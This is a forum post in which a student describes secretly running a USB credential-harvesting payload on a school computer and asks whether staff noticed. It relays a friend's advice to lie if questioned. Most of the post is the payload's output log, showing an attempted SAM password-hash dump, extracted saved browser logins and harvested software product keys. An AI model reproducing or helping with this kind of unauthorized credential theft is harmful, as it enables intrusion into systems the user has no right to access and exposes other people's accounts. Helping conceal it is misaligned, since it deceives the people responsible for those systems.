Do you think they say it...
Posted: Tue Mar 06, 2012 8:53 pm
Ok so I ran a usb pocketknife (find it on the hak5 forums) on a school computer. After I ran it Trendo Micro Office Scan Client poped up with a virus and I immedietly unplugged my flashdrive. a little while later I was looking up info about jobs in IT and the someone connected to the computer via a vnc sever running on it and restarted the computer. Is there any chance they saw anything and If so, why didnt they do anythig about it yet? They had like 6 hours to confront me about it. My friend said that if they ask tell them that you were using the computer and trend micro poped up and then the computer restarted and you don't know why. I had my flash drive already unplugged when they connected to the computer they have not attempted to connect back to check on me so I think that trendo micro told them that my computer had a virus and they fixed it and restarted it via vnc and didn't see anything obviosly wrong so they didnt do anything else.
Code: Select all
------------------------------- ----------------------------------------------------------------------------------------------
Leapos Payload [Time Started: Tue 03/06/2012 8:08:32.57]
-----------------------------------------------------------------------------------------------------------------------------
Computer Name is: ETL-07 and the Logged on User Is: removed by op
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [System info] +
+----------------------------------+
Windows IP Configuration
Host Name . . . . . . . . . . . . : ETL-07
Primary Dns Suffix . . . . . . . : removed by op
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : removed by op
removed by op
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : removed by op
Description . . . . . . . . . . . : Intel(R) 82566DM-2 Gigabit Network Connection
Physical Address. . . . . . . . . : 00-21-70- removed by op
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : removed by op
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : removed by op
DHCP Class ID . . . . . . . . . . : ET
DHCP Server . . . . . . . . . . . : removed by op
DNS Servers . . . . . . . . . . . : removed by op
removed by op
Primary WINS Server . . . . . . . : removed by op
Secondary WINS Server . . . . . . : removed by op
Lease Obtained. . . . . . . . . . : Tuesday, March 06, 2012 7:46:26 AM
Lease Expires . . . . . . . . . . : Wednesday, March 14, 2012 7:46:26 AM
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump SAM FGDUMP] +
+----------------------------------+
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.
--- Session ID: 2012-03-06-13-08-33 ---
>> A new worker thread has been created with the ID: 00000d84 <<
Starting dump on 127.0.0.1
** Beginning local dump **
INFO: skipping cachedump on 127.0.0.1 because 127.0.0.1.cachedump exists or I was told to skip cache dumps
INFO: skipping dump of protected storage secrets on 127.0.0.1 because 127.0.0.1.lsadump exists or I was told to skip LSA dumps
Skipping impersonation (no user provided)
OS (127.0.0.1): Microsoft Windows XP Professional Service Pack 3 (Build 2600)
Trend is running on this machine, shutting it down for a bit...
ERROR OpenService: 5 - Access is denied.
ERROR OpenService: 5 - Access is denied.
Unable to stop any Trend services, see previous errors for details.
Error dumping server 127.0.0.1, see previous messages for details
Terminating thread 00000d84 (lpszServer is NULL)
-----Summary-----
Failed servers:
127.0.0.1
Successful servers:
NONE
Total failed: 1
Total successful: 0
-----Hashes-----
E:\LOGS\ETL-07\ETL-07-[20120306-080829].log
The process cannot access the file because it is being used by another process.
Could Not Find E:\LOGS\ETL-07\127.0.0.1*
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump IE PW] +
+----------------------------------+
==================================================
Entry Name : https://accounts.google.com/servicelogin
Type : AutoComplete
Stored In : Registry
User Name : removed by op
Password :
==================================================
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Product Keys] +
+----------------------------------+
==================================================
Product Name : Microsoft Windows XP
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\WINDOWS
Service Pack : Service Pack 3
Computer Name : ETL-07
==================================================
==================================================
Product Name : Internet Explorer
Product ID : removed by op
Product Key : removed by op
Installation Folder :
Service Pack :
Computer Name : ETL-07
==================================================
==================================================
Product Name : Microsoft Office SharePoint Designer 2007
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\Program Files\Microsoft Office\Office12\
Service Pack :
Computer Name : ETL-07
==================================================
==================================================
Product Name : Microsoft Office Enterprise 2007
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\Program Files\Microsoft Office\Office12\
Service Pack :
Computer Name : ETL-07
==================================================
==================================================
Product Name : Microsoft Office Project Professional 2007
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\Program Files\Microsoft Office\Office12\
Service Pack :
Computer Name : ETL-07
==================================================
==================================================
Product Name : Microsoft Office Visio Professional 2007
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\Program Files\Microsoft Office\Office12\
Service Pack :
Computer Name : ETL-07
==================================================
-----------------------------------------------------------------------------------------------------------------------------
Leapos Payload [Time Finished: Tue 03/06/2012 8:08:34.96]
-----------------------------------------------------------------------------------------------------------------------------
